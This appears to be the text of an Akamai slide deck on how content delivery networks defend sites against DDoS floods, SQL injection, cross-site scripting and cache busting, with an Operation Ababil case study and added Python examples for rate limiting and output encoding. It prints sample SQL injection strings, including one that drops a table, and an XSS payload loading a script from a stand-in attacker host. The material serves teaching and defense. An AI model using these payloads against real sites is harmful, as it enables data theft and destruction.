The Role of Content Delivery Networks in Protecting Web Sites from Attacks
Bruce Maggs
VP for Research, Akamai Technologies
©2013 AKAMAI | FASTER FORWARD™
The Akamai Platform and Services
Daily Traffic:
• 33+ Tbps peak
• 19+ million hits per second
• 600+ million IPv4 clients/day
• 4+ trillion deliveries/day
• 30+ petabytes/day
• 10+ million concurrent streams
Delivering 130,000+ Domains:
• All top 60 ecommerce sites
• All top 30 media & entertainment companies
• 9 of the top 10 banks
• All of the top Internet portals
A Global Platform:
• 175,000+ Servers
• 1,300+ Networks
• 2,500+ Physical Locations
• 650+ Cities
• 100+ Countries
Distributed Denial of Service (DDoS) Attacks
The attacker hopes to overwhelm the content provider’s resources with requests for service.
Sometimes the attacker employs a “bot army” of compromised machines.
The attacker tries to issue requests for content that cannot be cached.
The attacker looks for “amplification” where an easy-to-generate request requires a difficult-to-generate response.
Attack Frequency (Attacks Detected and Mitigated)
[Chart: attacks per year, 2010–2014; bar values 991, 1317, 2002, 2936 and 5634 (the 2014 bar)]
Largest Attacks by Year
[Chart: largest attack per year, 2005–2014, in Gbps and Mpps. Legible values: 2010: 68 Gbps / 38 Mpps; 2011: 79 / 45; 2012: 82 / 69; 2013: 190 / 144; 2014: 320 / 270]
Attack Types Q3 2014
Attack Origins Q3 2014
• US 23.95%
• China 20.07%
• Brazil 17.60%
• Mexico 14.16%
• Korea 6.13%
• Germany 5.78%
• Japan 4.10%
• Russia 2.97%
• India 2.81%
• Thailand 2.43%
Targeted Industry Sectors
Avoid data theft and downtime by extending the security perimeter outside the data center, protecting against the increasing frequency, scale and sophistication of web attacks.
The Akamai Platform Provides a Perimeter Defense
[Diagram: End User → Akamai edge → Origin Server, with log-scale plots (1 to 10,000) comparing Akamai Traffic with Origin Traffic]
Defeating HTTP flooding attacks – Rate Controls
1. Count the number of Forward Requests
2. Block any IP address with excessive forward requests
[Diagram: Client Request → Akamai Edge Server → Forward Request → Customer Origin → Forward Response; a blocked client receives a Custom Error page instead]
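The two steps above, as an added example that is not Akamai code: a sliding-window counter of forward requests per client IP, with clients that exceed the limit answered from the edge with an error page instead of being forwarded. The log format, the addresses, and the window, limit and block-duration values are all constructed for this illustration.

```python
# Added example, not Akamai code: the two-step rate control from the slide
# (count forward requests per client IP, block IPs that exceed a limit) run
# over a constructed forward-request log. Window, limit and block duration
# are illustrative values chosen for this example.
from collections import defaultdict, deque

WINDOW_SECONDS = 10      # count forward requests over a sliding 10 s window
MAX_FORWARD = 5          # more than this many in the window triggers a block
BLOCK_SECONDS = 60       # how long a blocked client keeps getting the error page

# Constructed log of forward requests: "<epoch seconds> <client IP> <path>".
# A forward request is one the edge could not serve from cache and had to
# send to the customer origin, so it is the resource a flood tries to burn.
FORWARD_LOG = """\
1000 203.0.113.10 /account/balance
1001 203.0.113.10 /account/balance?x=1
1001 198.51.100.7 /search?q=rates
1002 203.0.113.10 /account/balance?x=2
1003 203.0.113.10 /account/balance?x=3
1004 203.0.113.10 /account/balance?x=4
1005 203.0.113.10 /account/balance?x=5
1006 203.0.113.10 /account/balance?x=6
1030 198.51.100.7 /search?q=loans
1031 203.0.113.10 /account/balance
"""


class RateControl:
    def __init__(self, window=WINDOW_SECONDS, limit=MAX_FORWARD, block=BLOCK_SECONDS):
        self.window, self.limit, self.block = window, limit, block
        self.recent = defaultdict(deque)   # client IP -> timestamps inside the window
        self.blocked_until = {}            # client IP -> time the block expires

    def decide(self, ts, ip):
        """Step 1: count this client's forward requests; step 2: block if excessive.
        Returns 'forward' (send to origin) or 'error_page' (answered at the edge)."""
        if self.blocked_until.get(ip, 0) > ts:
            return "error_page"
        q = self.recent[ip]
        q.append(ts)
        while q and q[0] <= ts - self.window:   # drop timestamps that left the window
            q.popleft()
        if len(q) > self.limit:
            self.blocked_until[ip] = ts + self.block
            q.clear()
            return "error_page"
        return "forward"


def replay(log_text, controller=None):
    """Run the controller over a log; return one (ip, path, decision) per line."""
    rc = controller or RateControl()
    out = []
    for line in log_text.splitlines():
        ts, ip, path = line.split(" ", 2)
        out.append((ip, path, rc.decide(int(ts), ip)))
    return out


def origin_load(decisions):
    """Number of requests that actually reached the origin."""
    return sum(1 for _, _, d in decisions if d == "forward")


if __name__ == "__main__":
    for ip, path, decision in replay(FORWARD_LOG):
        print(f"{ip:15} {decision:10} {path}")
```

In the constructed log, 203.0.113.10 sends six forward requests in six seconds; the sixth trips the limit and that client is served the error page for the next minute, while 198.51.100.7 is never touched. The window is deliberately short so that a burst is counted while it is still under way rather than averaged into quiet minutes; the Operation Ababil slides later in this deck note that attackers used burst probes specifically to slip under rate-limiting controls.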
Filtering Out Malformed Requests
• SQL injection attacks
• Cross-site scripting (XSS) attacks
• Cache busting attacks
Relational databases
Relational databases store tables consisting of rows and columns.
(image from http://support.sas.com)
Structured Query Language (SQL)
Example Query:
SELECT * FROM Employees WHERE LName = 'PARKER';
IdNum  LName   FName  JobCode  Salary  Phone
1354   PARKER  MARY   FA3      65800   914/455-2337
Example SQL Injection
Suppose a program creates the following SQL query, where userName is a variable holding input provided by an end-user, e.g., through a form on a Web page.
"SELECT * FROM Employees WHERE LName = '" + userName + "';"
But instead of entering a name like PARKER the user enters
' or '1'='1
Then the query becomes
SELECT * FROM Employees WHERE LName = '' or '1'='1';
This query returns all rows in the Employees table!
A More Destructive Injection
Same code as before:
"SELECT * FROM Employees WHERE LName = '" + userName + "';"
But now suppose the user enters
a'; DROP TABLE Employees
Then the query becomes
SELECT * FROM Employees WHERE LName = 'a'; DROP TABLE Employees;
This query might delete the Employees table! (Not all databases allow two queries in the same string.)
bobby-tables.com: A guide to preventing SQL injection
(from the comic strip xkcd)
Cross-Site Scripting
Attacker types this into text entry form:
<script src=http://theftsRus.com/script.js></script>
Attacker hopes that later the site will insert this into the HTML that it outputs, and then the victim’s browser will execute the script.
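The scenario above, as an added example that is not from the slides: the slide's form input is rendered once the way the attacker hopes (pasted into the page) and once with HTML output encoding, and a coarse tag detector of the kind an edge filter might log on is run over a few constructed form submissions. The field name, the submissions and the regular expression are constructed for this illustration.

```python
# Added example, not from the slides: the slide's form input rendered without and
# with output encoding, plus a coarse edge-side detector run over constructed form
# submissions. Field names, submissions and the regex are constructed here.
import html
import re
from urllib.parse import unquote_plus

# The string the slide's attacker types into the text entry form.
SLIDE_PAYLOAD = "<script src=http://theftsRus.com/script.js></script>"


def render_unsafe(comment: str) -> str:
    """What the attacker hopes for: stored text pasted straight into the page."""
    return '<p class="comment">' + comment + "</p>"


def render_safe(comment: str) -> str:
    """Encode &, <, > and quotes so the browser displays the text instead of running it."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


# A tag-like token (optional whitespace, optional '/', then a tag name) after URL
# decoding. This is a signature for logging or blocking at the edge, not a
# replacement for encoding on output: it misses encodings it does not decode.
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.IGNORECASE)


def looks_like_markup(field_value: str) -> bool:
    return TAG_RE.search(unquote_plus(field_value)) is not None


# Constructed form submissions as received by the edge: (field name, raw value).
SUBMISSIONS = [
    ("comment", "Great rates, thanks!"),
    ("comment", SLIDE_PAYLOAD),
    ("comment", "%3Cscript+src%3Dhttp%3A%2F%2Ftheftsrus.com%2Fscript.js%3E%3C%2Fscript%3E"),
    ("comment", "1 < 2 is true, so is 2 > 1"),
]


def flagged_values(submissions):
    """Values the detector would flag; ordinary comments pass through."""
    return [value for _, value in submissions if looks_like_markup(value)]


if __name__ == "__main__":
    print(render_unsafe(SLIDE_PAYLOAD))
    print(render_safe(SLIDE_PAYLOAD))
    for value in flagged_values(SUBMISSIONS):
        print("flagged:", value)
```

Encoding on output is the control that actually removes the risk: after html.escape the browser receives `&lt;script ...&gt;` and shows it as text. The detector is only a signal, which is why the example flags the URL-encoded copy of the same payload but deliberately lets "1 < 2" through.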
Cache Busting
Attacker adds query strings to the end of a requested URL, e.g.,
http://ak.xyz.com/logo.gif?id=832164328
Attacker hopes that the CDN will view each request with a different query string as a request for a different object, and fetch a new copy from the content provider.
Operation Ababil
Phase 1: Sep 12 – Early Nov 2012
• DNS packets with “AAAAA” payload
• Limited Layer 7 attacks
• Early-mid Oct 2012: announced names of banks where attacks succeeded
• (Did not announce bank names if attacks were unsuccessful)
• Began use of HTTP dynamic content to circumvent static caching defenses
Phase 2: Dec 12, 2012 – Jan 29
• Incorporate random query strings and values
• Addition of random query strings against PDFs
• Additions to bot army
• Burst probes to bypass rate-limiting controls
• Addition of valid argument names, random values
Phase 3: Late Feb 2013 – May 2013
• Multiple probes
• Multiple targets
• Increased focus on Layer 7 attacks
• Target banks where attacks work
• Fraudsters take advantage
“none of the U.S banks will be safe from our attacks”
Phase 4: July 2013 –
• Used fake plug-ins to infect files
Phase 1 Attack – Sept 2012
[Chart: DNS Traffic Handled by Akamai, Total eDNS, y-axis 0 to 1.8 M, Tues 12:00 through Wed 12:00]
Attack Traffic: 23 Gbps (10,000X normal)
Duration: 4.5 Hours
• High volume of non-standard packets sent to UDP port 53
• Packets did not include a valid DNS header
• Packets consisted of large blocks of repeating “A”s
• The packets were abnormally large
• Simultaneously, a SYN-Flood was directed against TCP port 53
Phase 2 Attacks - January 2nd, 2013
[Chart: traffic to Bank #1 through Bank #5]
QCF targeted PDF files
Akamai Dynamic Caching Rules offloaded 100% of the traffic
No Origin Impact
Phase 2 Attacks - January 2nd, 2013
[Chart: traffic to Bank #1 through Bank #5]
QCF targeted marketing web pages
Rate controls automatically activated
Attack was deflected, far from bank’s datacenter
No Origin Impact
Phase 2 Attacks - January 2nd, 2013
[Chart: traffic to Bank #1 through Bank #5]
QCF targeted SSL
Akamai offloaded 99% of the traffic
No Origin Impact
Phase 2 Attacks - January 2nd, 2013
Bank NOT on Akamai
[Chart: Gomez agents in 12 cities measuring hourly; Error/Outage—site not responding between 9:00 AM and 12:03 PM]
Phase 2 Attacks - January 2nd, 2013
Bank NOT on Akamai
[Chart: Gomez agents in 12 cities measuring hourly; Error/Outage—site not responding between 12:44 PM and 6:21 PM]
Phase 3 Attack Example
• Attack started on the morning of March 5, 2013
• Peak Attack Traffic > 126 thousand requests per second
• 70x normal Edge Bandwidth (29 Gbps)
• Origin Traffic stayed at normal levels
• ~2000 Agents participated in the 20 minute assault
• 80% of the agents were new IP addresses that had not participated in earlier campaigns
Attack Tactics - Pre-attack Reconnaissance
Attackers test the site with short burst high speed probes:
• Short bursts of attack requests on non-cacheable content every 10 minutes
• Peak of 18 million requests per second
If the site falters, they announce that they will attack that bank and return later with a full scale attack.
If the site is resilient they move on.
Observations
Due to recent attack sizes, infrastructure capacity build-out is not economical, and may not work anyway.
• Attacks range from 13X to 70X normal traffic, 25X to 120X normal request volume
The burst speed of attacks has become too fast for reactive mitigation – a proactive “always-on” defense is necessary.